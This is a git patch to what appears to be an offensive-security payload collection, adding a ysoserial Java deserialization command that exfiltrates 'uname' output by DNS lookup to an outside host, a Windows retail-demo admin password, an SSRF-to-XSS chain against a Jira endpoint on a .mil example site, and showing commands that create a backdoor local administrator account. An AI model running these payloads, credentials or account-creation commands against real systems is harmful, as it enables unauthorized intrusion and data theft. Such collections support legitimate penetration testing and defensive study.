From 4ad7c70e89cbf0e6689940c810409049edec7a59 Mon Sep 17 00:00:00 2001 From: Swissky Date: Wed, 6 Jun 2018 00:05:28 +0200 Subject: [PATCH] SSRF to XSS + Retail account Windows --- Java Deserialization/README.md | 1 + .../Windows - Using credentials.md | 10 +++++++++- SSRF injection/README.md | 11 +++++++++++ 3 files changed, 21 insertions(+), 1 deletion(-) diff --git a/Java Deserialization/README.md b/Java Deserialization/README.md index 6010ea5..b5070ab 100644 --- a/Java Deserialization/README.md +++ b/Java Deserialization/README.md @@ -6,6 +6,7 @@ java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin +java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 ``` payload | author | dependencies | impact (if not RCE) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 6658cb3..2809511 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -1,5 +1,6 @@ # Windows - Using credentials -Little tip, if you don't have credentials yet :D + +## TIP 1 - Create your credential :D ```powershell net user hacker hacker /add net localgroup administrators hacker /add @@ -10,6 +11,13 @@ net user /dom net user /domain ``` +## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) +when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin +```powershell +Username: RetailAdmin +Password: trs10 +``` + ## Metasploit - SMB ```c diff --git a/SSRF injection/README.md b/SSRF injection/README.md index b3fb0bd..0399cf4 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -194,6 +194,15 @@ Content of evil.com/redirect.php: ?> ``` +## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) +```bash +http://brutelogic.com.br/poc.svg -> simple alert +https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf + +https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg +``` + + ## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) Interesting path to look for at http://169.254.169.254 @@ -335,3 +344,5 @@ http://100.100.100.200/latest/meta-data/image-id * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/) * [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51) +* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) +* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) \ No newline at end of file